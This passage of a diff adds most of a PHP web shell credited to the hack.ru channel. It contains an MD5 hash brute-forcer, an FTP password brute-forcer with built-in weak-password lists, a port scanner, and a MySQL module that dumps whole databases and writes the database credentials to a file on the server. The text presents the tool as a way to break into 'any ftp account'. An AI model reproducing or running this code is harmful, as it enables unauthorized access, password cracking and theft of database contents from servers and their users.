+for ($i31 = 0; $i31 <= $c; $i31++) {
+
+$word[31] = $chars_de{$i31};
+
+if ($next <= 31) {
+
+result(implode($word));
+
+
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+
+
+function result($word) {
+
+global $dat,$date;
+
+$pass_de=$_POST[pass_de];
+
+$dat2=date("H:i:s");
+
+$date2=date("d:m:Y");
+
+
+
+if(md5($word)==$pass_de){
+
+print "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrcing result:</td></tr>
+
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file:  <b>".$word."_md5</b></td></tr>
+
+</table>
+
+                            ";
+
+							$f=@fopen($word._md5,"a+");
+
+                            fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n ");
+
+                             exit;}
+
+
+
+
+
+
+
+}
+
+
+
+function brut_ftp() {
+
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload . </blockquote></td></tr>
+
+</table>";
+
+
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)</td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute start' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+function s() {
+
+   $word="qwrtypsdfghjklzxcvbnm";
+
+   return $word[mt_rand(0,strlen($word)-1)];
+
+}
+
+
+
+function g() {
+
+   $word="euioam";
+
+   return $word[mt_rand(0,strlen($word)-2)];
+
+}
+
+
+
+function name0() {   return s().g().s();                        }
+
+function name1() {   return s().g().s().g();                    }
+
+function name2() {   return s().g().g().s();                    }
+
+function name3() {   return s().s().g().s().g();                }
+
+function name4() {   return g().s().g().s().g();                }
+
+function name5() {   return g().g().s().g().s();                }
+
+function name6() {   return g().s().s().g().s();                }
+
+function name7() {   return s().g().g().s().g();                }
+
+function name8() {   return s().g().s().g().g();                }
+
+function name9() {   return s().g().s().g().s().g();            }
+
+function name10() {   return s().g().s().s().g().s().s();        }
+
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+
+
+function randword() {
+
+   global $cool;
+
+   $func="name".mt_rand(0,11);
+
+   $func2="name".mt_rand(0,11);
+
+   switch (mt_rand(0,11)) {
+
+      case 0: return $func().mt_rand(5,99);
+
+      case 1: return $func()."-".$func2();
+
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+
+      case 3: return $func()."!".$func();
+
+      case 4: return randpass(mt_rand(5,12));
+
+      default: return $func();
+
+   }
+
+
+
+
+
+}
+
+
+
+function randpass($len) {
+
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+
+   $s="";
+
+   for ($i=0; $i<$len; $i++) {
+
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+
+   }
+
+   return $s;
+
+}
+
+if (@unlink("pass.txt") < 0){
+
+echo "nothing";
+
+exit;
+
+}
+
+$file="pass.txt";
+
+if($file && $host && $login){
+
+   $cn=mt_rand(30,30);
+
+for ($i=0; $i<$cn; $i++) {
+
+   $s=$cool2[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$s\n");
+
+   }
+
+
+
+  $cnt2=mt_rand(43,43);
+
+for ($i=0; $i<$cnt2; $i++) {
+
+   $r=$cool[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$login$r\n");
+
+}
+
+$p="$proverka";
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$p\n");
+
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+
+   for ($i=0; $i<$cnt3; $i++) {
+
+   $u=randword();
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$u\n");
+
+  }
+
+
+
+  if(is_file($file)){
+
+ $passwd=file($file,1000);
+
+  for($i=0; $i<count($passwd); $i++){
+
+   $stop=false;
+
+   $password=trim($passwd[$i]);
+
+   $open_ftp=@fsockopen($host,21);
+
+    if($open_ftp!=false){
+
+     fputs($open_ftp,"user $login\n");
+
+     fputs($open_ftp,"pass $password\n");
+
+     while(!feof($open_ftp) && $stop!=true){
+
+      $text=fgets($open_ftp,4096);
+
+      if(preg_match("/230/",$text)){
+
+       $stop=true;
+
+	   $f=@fopen($host._ftp,"a+");
+
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+
+
+       echo "
+
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! Password is known now.</font></b><br>
+
+&nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b><br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table>
+
+";exit;
+
+      }
+
+      elseif(preg_match("/530/",$text)){
+
+       $stop=true;
+
+
+
+      }
+
+     }
+
+     fclose($open_ftp);
+
+   }else{
+
+    echo "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At <b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr>
+
+</table>
+
+";exit;
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+}
+
+
+
+# port scanner
+
+function portscan() {
+
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time1 = $mtime;
+
+
+
+ $id = $HTTP_HOST;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and open ports" . "...<br></td></tr></table>";
+
+
+
+ $lport = $min;
+
+ $hport = $max;
+
+ $op = 0;
+
+ $gp = 0;
+
+
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4);
+
+  if ( !$fp ) { $gp++; }
+
+  else {
+
+   $port_addres = $port[$porta];
+
+   if($port_addres == "") $port_addres = "unknown";
+
+   $serv = getservbyport($porta, TCP);
+
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>What's the service is?</a>)</td></tr>";
+
+   $op++;
+
+  }
+
+ }
+
+
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></td></tr></table>";
+
+
+
+ $unsi = ($op/$porta)*100;
+
+ $unsi = round($unsi);
+
+
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Scan statistics:</b></b></td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbsp;$porta</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$op</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time2 = $mtime;
+
+ $loadtime = ($time2 - $time1);
+
+ $loadtime = round($loadtime, 2);
+
+
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbsp;&nbsp;$loadtime seconds</tr></table>";
+
+}
+
+
+
+function nfm_copyright() {
+
+global $action,$upass,$uname,$nfm;
+
+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+
+
+
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+
+// SQL functions start
+
+function aff_date() {
+
+ $date_now=date("F j,Y,g:i a");
+
+ return $date_now;
+
+}
+
+
+
+function sqldumptable($table) {
+
+ global $sv_s,$sv_d,$drp_tbl;
+
+ $tabledump = "";
+
+ if ($sv_s) {
+
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; }
+
+  $tabledump.="CREATE TABLE $table (\n";
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $tabledump.=",\n"; }
+
+   else { $firstfield=0;}
+
+   $tabledump.=" $champ[Field] $champ[Type]";
+
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";}
+
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";}
+
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $keys=mysql_query("SHOW KEYS FROM $table");
+
+  while ($key=mysql_fetch_array($keys)) {
+
+   $kname=$key['Key_name'];
+
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+
+   $index[$kname][]=$key['Column_name'];
+
+  }
+
+
+
+  @mysql_free_result($keys);
+
+  while(list($kname,$columns)=@each($index)) {
+
+   $tabledump.=",\n";
+
+   $colnames=implode($columns,",");
+
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+
+   else {
+
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+
+    $tabledump.=" KEY $kname ($colnames)";
+
+   }
+
+  }
+
+  $tabledump.="\n);\n\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $tabledump.="INSERT INTO $table VALUES(";
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $tabledump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";}
+
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+
+   }
+
+   $tabledump.=");\n";
+
+  }
+
+  @mysql_free_result($rows);
+
+ }
+
+
+
+ return $tabledump;
+
+}
+
+
+
+function csvdumptable($table) {
+
+ global $sv_s,$sv_d;
+
+ $csvdump="## Table:$table \n\n";
+
+ if ($sv_s) {
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $csvdump.=",";}
+
+   else { $firstfield=0;}
+
+   $csvdump.="'".$champ['Field']."'";
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $csvdump.="\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $csvdump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+
+   }
+
+   $csvdump.="\n";
+
+  }
+
+ }
+
+
+
+ @mysql_free_result($rows);
+
+ return $csvdump;
+
+}
+
+
+
+function write_file($data) {
+
+ global $g_fp,$file_type;
+
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+
+ else { fwrite ($g_fp,$data); }
+
+}
+
+
+
+function open_file($file_name) {
+
+ global $g_fp,$file_type,$dbbase,$f_nm;
+
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); }
+
+ else { $g_fp=fopen ($file_name,"w"); }
+
+
+
+ $f_nm[]=$file_name;
+
+ $data="";
+
+ $data.="##\n";
+
+ $data.="## NFM hack.ru creator \n";
+
+ $data.="##-------------------------\n";
+
+ $data.="## Date:".aff_date()."\n";
+
+ $data.="## Base:$dbbase \n";
+
+ $data.="##-------------------------\n\n";
+
+ write_file($data);
+
+ unset($data);
+
+}
+
+
+
+function file_pos() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { return gztell ($g_fp); }
+
+ else { return ftell ($g_fp); }
+
+}
+
+
+
+function close_file() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { gzclose ($g_fp); }
+
+ else { fclose ($g_fp); }
+
+}
+
+
+
+function split_sql_file($sql) {
+
+ $morc=explode(";",$sql);
+
+ $sql="";
+
+ $output=array();
+
+ $matches=array();
+
+ $morc_cpt=count($morc);
+
+ for ($i=0;$i < $morc_cpt;$i++) {
+
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+
+   else {
+
+    $temp=$morc[$i].";";
+
+    $morc[$i]="";
+
+    $complete_stmt=false;
+
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+     if (($unescaped_quotes % 2)==1) {
+
+      $output[]=$temp.$morc[$j];
+
+      $morc[$j]="";
+
+      $temp="";
+
+      $complete_stmt=true;
+
+      $i=$j;
+
+     } else {
+
+      $temp.=$morc[$j].";";
+
+      $morc[$j]="";
+
+     }
+
+    }
+
+   }
+
+  }
+
+ }
+
+ return $output;
+
+}
+
+
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+
+// SQL functions END
+
+
+
+// main SQL()
+
+function sql() {
+
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+
+ $secu_config="xtdump_conf.inc.php";
+
+ $dbhost=$_POST['dbhost'];
+
+ $dbuser=$_POST['dbuser'];
+
+ $dbpass=$_POST['dbpass'];
+
+ $dbbase=$_POST['dbbase'];
+
+ $tbls =$_POST['tbls'];
+
+ $sqlaction =$_POST['sqlaction'];
+
+ $secu =$_POST['secu'];
+
+ $f_cut =$_POST['f_cut'];
+
+ $fz_max =$_POST['fz_max'];
+
+ $opt =$_POST['opt'];
+
+ $savmode =$_POST['savmode'];
+
+ $file_type =$_POST['file_type'];
+
+ $ecraz =$_POST['ecraz'];
+
+ $f_tbl =$_POST['f_tbl'];
+
+ $drp_tbl=$_POST['drp_tbl'];
+
+
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+
+
+ // SQL actions STARTS
+
+
+
+ if ($sqlaction=='save') {
+
+  if ($secu==1) {
+
+   $fp=fopen($secu_config,"w");
+
+   fputs($fp,"<?php\n");
+
+   fputs($fp,"\$dbhost='$dbhost';\n");
+
+   fputs($fp,"\$dbbase='$dbbase';\n");
+
+   fputs($fp,"\$dbuser='$dbuser';\n");
+
+   fputs($fp,"\$dbpass='$dbpass';\n");
+
+   fputs($fp,"?>");
+
+   fclose($fp);
+
+  }
+
+  if (!is_array($tbls)) {
+
+   echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
+
+<br><center><font color=red>You forgot to check tables, which you need to dump =)</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+  if($f_cut==1) {
+
+   if (!is_numeric($fz_max)) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une valeur num?rique ? la taille du fichier ? scinder.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+   if ($fz_max < 200000) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup
+
+    rieure ? 200 000 Octets.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+  }
+
+
+
+  $tbl=array();
+
+  $tbl[]=reset($tbls);
+
+  if (count($tbls) > 1) {
+
+   $a=true;
+
+   while ($a !=false) {
+
+    $a=next($tbls);
+
+    if ($a !=false) { $tbl[]=$a; }
+
+   }
+
+  }
+
+
+
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; }
+
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+
+  else { exit; }
+
+
+
+  $fext=".".$savmode;
+
+  $fich=$dbbase.$fc.$fext;
+
+  $dte="";
+
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+
+  if ($file_type=='1') { $gz.=".gz"; }
+
+  $fcut=false;
+
+  $ftbl=false;
+
+  $f_nm=array();
+
+  if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;}
+
+  if($f_tbl==1) { $ftbl=true; }
+
+  else {
+
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+
+  }
+
+
+
+  $nbf=1;
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  mysql_select_db($dbbase);
+
+  if ($fext==".sql") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+
+      $nbf=0;
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+
+      }
+
+      close_file();
+
+     }
+
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    $tblsv="";
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+
+        write_file($val.";");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+  else if ($fext==".csv") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      $nbf=0;
+
+      $p_csv=split_csv_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+      close_file();
+
+     } else {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      write_file($temp."\n\n");
+
+      close_file();
+
+      $nbf=1;
+
+     }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_csv=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+
+
+  mysql_close();
+
+  if (!$ftbl) { close_file(); }
+
+
+
+  echo $header;
+
+  echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  reset($f_nm);
+
+  while (list($i,$val)=each($f_nm)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3'; }
+
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+
+   $fz_tmp=filesize($val);
+
+   if ($fcut && ($fz_tmp > $fz_max)) {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+
+   } else {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites</font>&nbsp;</td><td></td></tr>";
+
+   }
+
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  }
+
+  echo "</table><br>";
+
+  echo $footer;exit;
+
+ }
+
+
+
+ if ($sqlaction=='connect') {
+
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) {
+
+   echo $header."<br><center><font color=red><b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if(!@mysql_select_db($dbbase)) {
+
+   echo $header."<br><center><font color=red><<b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if ($secu==1) {
+
+   if (!file_exists($secu_config)) {
+
+    $fp=fopen($secu_config,"w");
+
+    fputs($fp,"<?php\n");
+
+    fputs($fp,"\$dbhost='$dbhost';\n");
+
+    fputs($fp,"\$dbbase='$dbbase';\n");
+
+    fputs($fp,"\$dbuser='$dbuser';\n");
+
+    fputs($fp,"\$dbpass='$dbpass';\n");
+
+    fputs($fp,"?>");
+
+    fclose($fp);
+
+   }
+
+   include($secu_config);
+
+  } else {
+
+   if (file_exists($secu_config)) { unlink($secu_config); }
+
+  }
+
+
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  $tables=mysql_list_tables($dbbase);
+
+  $nb_tbl=mysql_num_rows($tables);
+
+
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tables you need to dump!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+
+
+  $i=0;
+
+  while ($i < mysql_num_rows ($tables)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3';}
+
+   $tb_nom=mysql_tablename ($tables,$i);
+
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+   $i++;
+
+  }
+
+
+
